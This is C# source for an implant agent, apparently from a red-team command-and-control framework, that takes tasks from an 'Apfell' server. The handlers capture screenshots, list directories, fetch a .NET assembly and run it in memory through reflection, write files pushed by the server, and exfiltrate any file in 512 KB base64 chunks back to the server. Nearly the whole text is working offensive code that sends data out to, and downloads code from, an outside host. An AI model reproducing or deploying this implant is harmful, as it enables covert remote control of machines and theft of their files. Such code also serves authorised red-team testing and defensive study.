// Same workflow as sending a file to Apfell server, but we only use one chunk
private static void SendCapture(SCImplant implant, SCTask task, byte[] screenshot)
{
try // Try block for HTTP request
{
// Send total number of chunks to Apfell server
// Number of chunks will always be one for screen capture task
// Receive file ID in response
SCTaskResp initial = new SCTaskResp(task.id, "{\"total_chunks\": " + 1 + ", \"task\":\"" + task.id + "\"}");
DownloadReply reply = JsonConvert.DeserializeObject <DownloadReply>(implant.PostResponse(initial));
Debug.WriteLine($"[-] SendCapture - Received reply, file ID: " + reply.file_id);
// Convert chunk to base64 blob and create our FileChunk
FileChunk fc = new FileChunk();
fc.chunk_num = 1;
fc.file_id = reply.file_id;
fc.chunk_data = Convert.ToBase64String(screenshot);
// Send our FileChunk to Apfell server
// Receive status in response
SCTaskResp response = new SCTaskResp(task.id, JsonConvert.SerializeObject(fc));
Debug.WriteLine($"[+] SendCapture - CHUNK SENT: {fc.chunk_num}");
string postReply = implant.PostResponse(response);
Debug.WriteLine($"[-] SendCapture - RESPONSE: {implant.PostResponse(response)}");
// Tell the Apfell server file transfer is done
implant.SendComplete(task.id);
}
catch (Exception e) // Catch exceptions from HTTP requests
{
// Something failed, so we need to tell the server about it
task.status = "error";
task.message = e.Message;
}
}
public static void Execute(SCTask task, SCImplant implant)
{
string path = task.@params;
SharpSploitResultList <Host.FileSystemEntryResult> list;
try
{
if (path != "")
{
list = Host.GetDirectoryListing(path);
}
else
{
list = Host.GetDirectoryListing();
}
List <Dictionary <string, string> > fileList = new List <Dictionary <string, string> >();
foreach (Host.FileSystemEntryResult item in list)
{
FileInfo f = new FileInfo(item.Name);
Dictionary <string, string> infoDict = new Dictionary <string, string>();
try
{
infoDict.Add("size", f.Length.ToString());
infoDict.Add("type", "file");
infoDict.Add("name", f.Name);
fileList.Add(infoDict);
}
catch
{
infoDict.Add("size", "0");
infoDict.Add("type", "dir");
infoDict.Add("name", item.Name);
fileList.Add(infoDict);
}
}
SCTaskResp response = new SCTaskResp(task.id, JsonConvert.SerializeObject(fileList));
implant.PostResponse(response);
implant.SendComplete(task.id);
task.status = "complete";
task.message = fileList.ToString();
}
catch (DirectoryNotFoundException)
{
Debug.WriteLine($"[!] DirectoryList - ERROR: Directory not found: {path}");
implant.SendError(task.id, "Error: Directory not found.");
task.status = "error";
task.message = "Directory not found.";
}
catch (Exception e)
{
Debug.WriteLine($"DirectoryList - ERROR: {e.Message}");
implant.SendError(task.id, $"Error: {e.Message}");
task.status = "error";
task.message = e.Message;
}
}
public static void Execute(SCTask task, SCImplant implant)
{
try
{
implant.SendComplete(task.id);
}
catch (Exception e)
{
implant.SendError(task.id, e.Message);
}
Environment.Exit(0);
}
public static void Execute(SCTask task, SCImplant implant)
{
JObject json = (JObject)JsonConvert.DeserializeObject(task.@params);
string file_id = json.Value <string>("file_id");
string[] args = json.Value <string[]>("args");
byte[] assemblyBytes = Upload.GetFile(file_id, implant);
Reflection.Assembly assembly = Reflection.Assembly.Load(assemblyBytes);
string result = assembly.EntryPoint.Invoke(null, args).ToString();
implant.PostResponse(new SCTaskResp(task.id, result));
implant.SendComplete(task.id);
}
public static void Execute(SCTask task, SCImplant implant)
{
JObject json = (JObject)JsonConvert.DeserializeObject(task.@params);
string file_id = json.Value <string>("file_id");
string filepath = json.Value <string>("remote_path");
Debug.WriteLine("[-] Upload - Tasked to get file " + file_id);
// If file exists, don't write file
if (File.Exists(filepath))
{
Debug.WriteLine($"[!] Upload - ERROR: File exists: {filepath}");
implant.SendError(task.id, "ERROR: File exists.");
}
else
{
// First we have to request the file from the server with a POST
string fileEndpoint = implant.endpoint + "files/callback/" + implant.callbackId;
try // Try block for HTTP request
{
string payload = "{\"file_id\": \"" + file_id + "\"}";
string result = HTTP.Post(fileEndpoint, payload);
byte[] output = Convert.FromBase64String(result);
try // Try block for writing file to disk
{
// Write file to disk
File.WriteAllBytes(filepath, output);
implant.SendComplete(task.id);
Debug.WriteLine("[+] Upload - File written: " + filepath);
}
catch (Exception e) // Catch exceptions from file write
{
// Something failed, so we need to tell the server about it
implant.SendError(task.id, e.Message);
Debug.WriteLine("[!] Upload - ERROR: " + e.Message);
}
}
catch (Exception e) // Catch exceptions from HTTP request
{
// Something failed, so we need to tell the server about it
implant.SendError(task.id, e.Message);
Debug.WriteLine("[!] Upload - ERROR: " + e.Message);
}
}
}
public static void Execute(SCTask task, SCImplant implant)
{
string filepath = task.@params;
try // Try block for file upload task
{
// Get file info to determine file size
FileInfo fileInfo = new FileInfo(filepath);
long size = fileInfo.Length;
Debug.WriteLine($"[+] Download - DOWNLOADING: {filepath}, {size} bytes");
// Determine number of 512kb chunks to send
long total_chunks = size / 512000;
// HACK: Dumb workaround because longs don't have a ceiling operation
if (total_chunks == 0)
{
total_chunks = 1;
}
Debug.WriteLine($"[+] Download - File size = {size} ({total_chunks} chunks)");
// Send number of chunks associated with task to Apfell server
// Response will have the file ID to send file with
SCTaskResp initial = new SCTaskResp(task.id, "{\"total_chunks\": " + total_chunks + ", \"task\": \"" + task.id + "\"}");
DownloadReply reply = JsonConvert.DeserializeObject <DownloadReply>(implant.PostResponse(initial));
Debug.WriteLine($"[-] Download - Received reply, file ID: " + reply.file_id);
// Send file in chunks
for (int i = 0; i < total_chunks; i++)
{
byte[] chunk = null;
long pos = i * 512000;
// We need to use a FileStream in case our file size in bytes is larger than an Int32
// With a filestream, we can specify a position as a long, and then use Read() normally
using (FileStream fs = new FileStream(filepath, FileMode.Open, FileAccess.Read, FileShare.ReadWrite))
{
fs.Position = pos;
// If this is the last chunk, size will be the remaining bytes
if (i == total_chunks - 1)
{
chunk = new byte[size - (i * 512000)];
int chunkSize = chunk.Length;
fs.Read(chunk, 0, chunkSize);
}
// Otherwise we'll read 512kb from the file
else
{
chunk = new byte[512000];
fs.Read(chunk, 0, 512000);
}
}
// Convert chunk to base64 blob and create our FileChunk
FileChunk fc = new FileChunk();
fc.chunk_num = i;
fc.file_id = reply.file_id;
fc.chunk_data = Convert.ToBase64String(chunk);
// Send our FileChunk to Apfell server
SCTaskResp response = new SCTaskResp(task.id, JsonConvert.SerializeObject(fc));
Debug.WriteLine($"[+] Download - CHUNK SENT: {fc.chunk_num}");
Debug.WriteLine($"[-] Download - RESPONSE: {implant.PostResponse(response)}");
// Make sure we respect the sleep setting
Thread.Sleep(implant.sleep);
}
// Tell the Apfell server file transfer is done
implant.SendComplete(task.id);
Debug.WriteLine($"[+] Download - File transfer complete: {filepath}");
}
catch (Exception e) // Catch any exception from file upload
{
// Something failed, so we need to tell the server about it
task.status = "error";
task.message = e.Message;
}
}